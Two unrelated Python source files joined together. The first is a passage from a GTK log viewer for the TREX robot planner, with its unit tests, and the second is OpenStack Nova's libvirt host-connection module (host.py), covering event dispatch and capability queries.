# Multi-threaded polling functions
############################################################################
# This function continuously reloads the available ticks in a given reactor path
def latest_reload_loop(self):
while self.running:
gtk.gdk.threads_enter()
self.reload_lock.acquire()
# Check the available reactors
self.load_available_reactors()
# Check the available ticks
self.load_available_ticks()
# Reload if there is a newer tick available
if self.do_reload:
if len(self.ticks) > 0 and self.ticks[-1] != self.tick:
self.load_tick(self.ticks[-1])
self.reload_lock.release()
gtk.gdk.threads_leave()
# Sleep before trying again
time.sleep(0.1)
############################################################################
# DbReader interaction
############################################################################
# Get all available data for a given tick from the db_reader
def load_tick(self,new_tick):
try:
# Check if this tick exists
if new_tick not in self.ticks:
raise IOError
# Clear temporary dict
db_cores = {}
# load data for each reactor
for reactor_name in self.reactor_names:
# Load db cores
db_core = self.db_reader.load_db(
self.log_path,
reactor_name,
new_tick)
# Check load settings for assemblies
if self.load_available_assemblies or self.assembly_ticks_only:
try:
assembly = self.db_reader.load_assembly(
self.log_path,
reactor_name,
new_tick)
# Append the assembly to this db_core
db_core.assembly = assembly
except:
pass
# Append db core to temporary dict
db_cores[reactor_name] = db_core
# If we get here, the tick was loaded successfully
self.db_cores = db_cores
self.tick = new_tick
# Post an update to the status bar
self.set_status("Loaded Tick [%s] from \"%s\"" % (self.format_tick(self.tick),self.reactor_chooser.get_active_text()))
except ValueError:
self.set_status("Invalid tick entry!")
except:
self.set_status("Could not load Tick [%s] from \"%s\"!" % (self.format_tick(new_tick),self.reactor_chooser.get_active_text()))
# Update gui
self.update_tick_entry()
self.update_available_buttons()
# Notify listeners
self.notify_listeners()
############################################################################
# Callback registration for classes that process loaded data
############################################################################
# Function to register on load
def register_listener(self,listener_cb):
self.listeners.append(listener_cb)
# Function to unregister a listener callback
def unregister_listener(self,listener_cb):
if listener_cb in self.listeners:
self.listeners.remove(listener_cb)
# Function that notifies listeners with new assembly when it is loaded
def notify_listeners(self):
for listener in self.listeners:
try:
#print "NOTIFYING %s WITH %s\n\t%s\n\t%s" %(str(listener),self.format_tick(self.tick),str(self.db_cores),self.reactor_name)
listener(self.db_cores, self.reactor_name)
#print "NOTIFIED!"
except:
print "Failed to notify listener: "+str(listener)
# Testing utilities
class GtkTester():
def spawn_gtk_thread(self):
        # Spawn a background thread that runs the gtk main loop
gtk_thread = threading.Thread(target=self.gtk_thread)
gtk_thread.start()
def gtk_thread(self):
        # Thread body: run the gtk main loop until the window is destroyed
print "Spawning gtk thread..."
self.db_reader_window.w.connect("destroy",gtk.main_quit)
gtk.main()
# Define a simple listener for callbacks
class SimpleAssemblyListener():
def __init__(self):
self.rules = {}
self.tokens = {}
def cb_rules(self,db_cores,reactor_name):
if reactor_name:
self.rules = db_cores[reactor_name].assembly.rules
print "RECEVIED %d RULES" % len(self.rules)
else:
self.rules = {}
print "EMPTY DATABASE"
def cb_tokens(self,db_cores,reactor_name):
if reactor_name:
self.tokens = db_cores[reactor_name].assembly.tokens
else:
self.tokens = {}
# Unit tests
class TestDbReaderWindow(unittest.TestCase,GtkTester):
# Create the gtk thread and window structure
def setUp(self):
# Initialize GTK Python threading functionality
gtk.gdk.threads_init()
# Create a new db reader
self.db_reader = DbReader()
# Create a new db reader window
self.db_reader_window = DbReaderWindow(self.db_reader)
# Create a new listener
self.listener = SimpleAssemblyListener()
# Register callbacks
self.db_reader_window.register_listener(self.listener.cb_rules)
self.db_reader_window.register_listener(self.listener.cb_tokens)
# Spawn the window
self.spawn_gtk_thread()
# Destroy window and kill gtk
def tearDown(self):
print "Killing The window..."
self.db_reader_window.w.destroy()
time.sleep(5)
# Test basic user-driven reading of logs
def test_reading(self):
# Wait for the window to come up
time.sleep(2)
# Define data constants
LOG_PATH = TREX.util.trex_path("tools/test/db_reader")
REACTORS = ["pr2.doorman","pr2.navigator","pr2.driver"]
TICKS = [(t,0) for t in range(0,10)]
GO_TICK = (5,0)
print "Setting the log path..."
self.db_reader_window.path_chooser.set_filename(LOG_PATH)
time.sleep(2)
print "Checking available data was loaded properly..."
# Assert the log path was loaded properly
self.assert_(LOG_PATH == self.db_reader_window.log_path)
# Assert the reactors were loaded properly
self.assert_(REACTORS == self.db_reader_window.reactor_names)
# Assert all the expected ticks were loaded properly
print self.db_reader_window.ticks
self.assert_(TICKS == self.db_reader_window.ticks)
print "Checking navigation buttons..."
self.db_reader_window.st_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == TICKS[0])
self.db_reader_window.en_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == TICKS[-1])
self.db_reader_window.bk_but.emit("clicked")
self.assert_(self.db_reader_window.tick == TICKS[-2])
time.sleep(1)
self.db_reader_window.fw_but.emit("clicked")
self.assert_(self.db_reader_window.tick == TICKS[-1])
print "Enabling assembly restriction..."
self.db_reader_window.assembly_ticks_only_check.set_active(True)
self.db_reader_window.assembly_ticks_only_check.emit("toggled")
time.sleep(4)
print "Checking listeners were notified..."
self.assert_(len(self.listener.rules) > 0)
self.assert_(len(self.listener.tokens) > 0)
print "Disabling assembly restriction..."
self.db_reader_window.assembly_ticks_only_check.set_active(False)
self.db_reader_window.assembly_ticks_only_check.emit("toggled")
time.sleep(4)
print "Checking tick entry..."
self.db_reader_window.tick_entry.set_text(self.db_reader_window.format_tick(GO_TICK))
time.sleep(1)
self.db_reader_window.go_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == GO_TICK)
print "Checking invalid tick entry reversion..."
self.db_reader_window.tick_entry.set_text("100000")
time.sleep(1)
self.db_reader_window.go_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == GO_TICK)
print "Moving to an empty path..."
self.db_reader_window.path_chooser.set_filename(os.path.abspath("."))
time.sleep(2)
print "Checking listeners were notified..."
self.assert_(len(self.listener.rules) == 0)
self.assert_(len(self.listener.tokens) == 0)
time.sleep(2)
def copy_children(self,src,dest):
# Copy each child into dest
for c in os.listdir(src):
if c[0] != '.':
if os.path.isdir(os.path.join(src,c)):
shutil.copytree(os.path.join(src,c),os.path.join(dest,c))
else:
shutil.copy2(os.path.join(src,c),os.path.join(dest,c))
def copy_ticks(self,src,dest,reactors,ticks):
for tick in ticks:
tick_name = "%d.%d.%s" % (tick[0],tick[1],DbReader.DB_EXT)
for r in reactors:
shutil.copy2(
os.path.join(src,r,DbReader.DB_PATH,tick_name),
os.path.join(dest,r,DbReader.DB_PATH,tick_name))
time.sleep(0.1)
# Test auto-reload functionality
def test_autoload(self):
# Wait for the window to come up
time.sleep(2)
SRC_LOG_PATH = TREX.util.trex_path("tools/test/db_reader")
LOG_PATH = TREX.util.trex_path("tools/test/db_reader_window")
REACTORS = ["pr2.doorman","pr2.navigator","pr2.driver"]
TICKS = [(i,0) for i in range(0,9)]
if os.path.exists(LOG_PATH):
print "Clearing log directory..."
shutil.rmtree(LOG_PATH)
print "Creating log directory..."
os.mkdir(LOG_PATH)
for r in REACTORS:
os.mkdir(os.path.join(LOG_PATH,r))
print "Setting the log path..."
self.db_reader_window.path_chooser.set_filename(LOG_PATH)
time.sleep(1.0)
print "Creating reactor directories"
for r in REACTORS:
os.mkdir(os.path.join(LOG_PATH,r,DbReader.ASSEMBLY_PATH))
os.mkdir(os.path.join(LOG_PATH,r,DbReader.DB_PATH))
time.sleep(1.0)
print "Checking for automatic reactor pick-up..."
print self.db_reader_window.reactor_names
self.assert_(REACTORS == self.db_reader_window.reactor_names)
print "Copying full plan dumps..."
for r in REACTORS:
self.copy_children(
os.path.join(SRC_LOG_PATH,r,DbReader.ASSEMBLY_PATH),
os.path.join(LOG_PATH,r,DbReader.ASSEMBLY_PATH))
print "Copying reactor states..."
self.copy_ticks(SRC_LOG_PATH,LOG_PATH,REACTORS,TICKS)
print "Checking for automatic tick pick-up..."
self.assert_(TICKS == self.db_reader_window.ticks)
print "Enabling automatic tick tracking..."
self.db_reader_window.latest_toggle.set_active(True)
self.db_reader_window.latest_toggle.emit("toggled")
time.sleep(2)
self.copy_ticks(SRC_LOG_PATH,LOG_PATH,REACTORS,[(9,0)])
time.sleep(0.1)
print "Checking for automatic tick tracking..."
self.assert_(self.db_reader_window.tick_entry.get_text() == self.db_reader_window.format_tick((9,0)))
print "Removing log directory..."
shutil.rmtree(LOG_PATH)
time.sleep(4)
print "Checking for no reactor pick-up..."
self.assert_(len(self.db_reader_window.reactor_names) == 0)
if __name__ == '__main__':
unittest.main()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import operator
import os
import socket
import sys
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
# FIXME(mriedem): VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent
# when live migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
        self._event_thread.daemon = True
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
alldoms = self.get_connection().listAllDomains(flags)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info("Libvirt host capabilities %s", xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we follow the advice of the experts that for
now it's sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
            machine_type = libvirt_utils.get_default_machine_type(arch)
emulator_bin = guest.emulator
if virt_type in guest.domemulator:
emulator_bin = guest.domemulator[virt_type]
# It is expected that each <guest> will have a different
# architecture, but it doesn't hurt to add a safety net to
# avoid needlessly calling libvirt's API more times than
# we need.
if machine_type and machine_type in domain_caps[arch]:
continue
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this
# architecture. In that case we pass a machine_type of
# None to the libvirt API and rely on it choosing a
# sensible default which will be returned in the <machine>
# element. It could also be an alias like 'pc' rather
# than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked
# its default machine type for x86, 'pc', as reported by
# QEMU's default. From libvirt v4.7.0 onwards, libvirt
# _explicitly_ declared the "preferred" default for x86 as
# 'pc' (and appropriate values for other architectures),
# and only uses QEMU's reported default (whatever that may
# be) if 'pc' does not exist. This was done "to isolate
# applications from hypervisor changes that may cause
# incompatibilities" -- i.e. if, or when, QEMU changes its
# default machine type to something else. Refer to this
# libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
                # if the machine type has already been recorded.
if arch in domain_caps:
domain_caps.pop(arch)
continue
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
